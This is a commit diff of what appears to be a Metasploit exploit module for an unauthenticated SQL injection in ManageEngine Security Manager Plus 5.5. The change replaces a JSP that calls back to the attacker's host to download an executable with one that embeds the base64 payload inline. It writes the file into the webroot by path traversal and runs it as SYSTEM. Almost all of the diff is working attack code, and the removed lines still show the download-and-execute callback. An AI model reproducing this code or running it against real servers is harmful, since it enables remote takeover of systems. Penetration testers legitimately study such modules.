Write EXE to JSP instead of using a TCPServer
parent
e5ec51a780
commit
923ffe277d
|
@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::Remote::TcpServer
|
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
|
@ -19,10 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",
|
'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a SQL injection found in ManageEngine Security Manager Plus
|
This module exploits a SQL injection found in ManageEngine Security Manager Plus
|
||||||
advanced search page. It will send a malicious SQL query to create a JSP file
|
advanced search page, which results in remote code execution under the context of
|
||||||
under the web root directory, and then let it download and execute our malicious
|
SYSTEM. Authentication is not required in order to exploit this vulnerability.
|
||||||
executable under the context of SYSTEM. Authentication is not required in order
|
|
||||||
to exploit this vulnerability.
|
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
@ -87,16 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
#
|
|
||||||
# Transfer the malicious executable to our victim
|
|
||||||
#
|
|
||||||
def on_client_connect(cli)
|
|
||||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)")
|
|
||||||
cli.put(@native_payload)
|
|
||||||
service.close_client(cli)
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Generate a download+exe JSP payload
|
# Generate a download+exe JSP payload
|
||||||
#
|
#
|
||||||
|
@ -104,43 +91,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
|
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
|
||||||
my_port = datastore['SRVPORT']
|
my_port = datastore['SRVPORT']
|
||||||
|
|
||||||
var_buf = Rex::Text.rand_text_alpha(rand(8) + 3)
|
native_payload = Rex::Text.encode_base64(generate_payload_exe)
|
||||||
var_shellcode = Rex::Text.rand_text_alpha(rand(8) + 3)
|
native_payload_name = rand_text_alpha(rand(6)+3)
|
||||||
var_outstream = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
||||||
var_socket = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
||||||
var_bufreader = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
||||||
var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
||||||
var_temp = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
||||||
var_path = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
||||||
var_proc = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
||||||
|
|
||||||
jsp = %Q|
|
jsp = %Q|
|
||||||
<%@page import="java.io.*"%>
|
<%@page import="java.io.*"%>
|
||||||
<%@page import="java.net.*"%>
|
|
||||||
<%@page import="sun.misc.BASE64Decoder"%>
|
<%@page import="sun.misc.BASE64Decoder"%>
|
||||||
|
|
||||||
<%
|
<%
|
||||||
StringBuffer #{var_buf} = new StringBuffer();
|
byte[] shellcode = null;
|
||||||
byte[] #{var_shellcode} = null;
|
BufferedOutputStream outstream = null;
|
||||||
BufferedOutputStream #{var_outstream} = null;
|
|
||||||
try {
|
try {
|
||||||
Socket #{var_socket} = new Socket("#{my_host}", #{my_port});
|
String buf = "#{native_payload}";
|
||||||
BufferedReader #{var_bufreader} = new BufferedReader(new InputStreamReader(#{var_socket}.getInputStream()));
|
|
||||||
while (#{var_buf}.length() < #{@native_payload.length}) {
|
|
||||||
#{var_buf}.append( (char) #{var_bufreader}.read());
|
|
||||||
}
|
|
||||||
|
|
||||||
BASE64Decoder #{var_decoder} = new BASE64Decoder();
|
BASE64Decoder decoder = new BASE64Decoder();
|
||||||
#{var_shellcode} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
|
shellcode = decoder.decodeBuffer(buf.toString());
|
||||||
|
|
||||||
File #{var_temp} = File.createTempFile("#{@native_payload_name}", ".exe");
|
File temp = File.createTempFile("#{native_payload_name}", ".exe");
|
||||||
String #{var_path} = #{var_temp}.getAbsolutePath();
|
String path = temp.getAbsolutePath();
|
||||||
|
|
||||||
#{var_outstream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
|
outstream = new BufferedOutputStream(new FileOutputStream(path));
|
||||||
#{var_outstream}.write(#{var_shellcode});
|
outstream.write(shellcode);
|
||||||
#{var_outstream}.close();
|
outstream.close();
|
||||||
|
|
||||||
Process #{var_proc} = Runtime.getRuntime().exec(#{var_path});
|
Process p = Runtime.getRuntime().exec(path);
|
||||||
} catch (Exception e) {}
|
} catch (Exception e) {}
|
||||||
%>
|
%>
|
||||||
|
|
|
|
||||||
|
@ -156,9 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# Run the actual exploit
|
# Run the actual exploit
|
||||||
#
|
#
|
||||||
def inject_exec
|
def inject_exec
|
||||||
# This little lag is meant to ensure the TCP server runs first before the requests
|
|
||||||
select(nil, nil, nil, 1)
|
|
||||||
|
|
||||||
# Inject our JSP payload
|
# Inject our JSP payload
|
||||||
hex_jsp = generate_jsp_payload
|
hex_jsp = generate_jsp_payload
|
||||||
|
|
||||||
|
@ -211,19 +182,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# The server must start first, and then we send the malicious requests
|
# The server must start first, and then we send the malicious requests
|
||||||
#
|
#
|
||||||
def exploit
|
def exploit
|
||||||
# Avoid passing this as an argument for performance reasons
|
@jsp_name = rand_text_alpha(rand(6)+3)
|
||||||
# This is in base64 is make sure our file isn't mangled
|
@outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\""
|
||||||
@native_payload = [generate_payload_exe].pack("m*")
|
|
||||||
@native_payload_name = rand_text_alpha(rand(6)+3)
|
|
||||||
@jsp_name = rand_text_alpha(rand(6)+3)
|
|
||||||
@outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\""
|
|
||||||
|
|
||||||
begin
|
inject_exec
|
||||||
t = framework.threads.spawn("reqs", false) { inject_exec }
|
|
||||||
print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
|
|
||||||
super
|
|
||||||
ensure
|
|
||||||
t.kill
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
end
|
end
|
Loading…
Reference in New Issue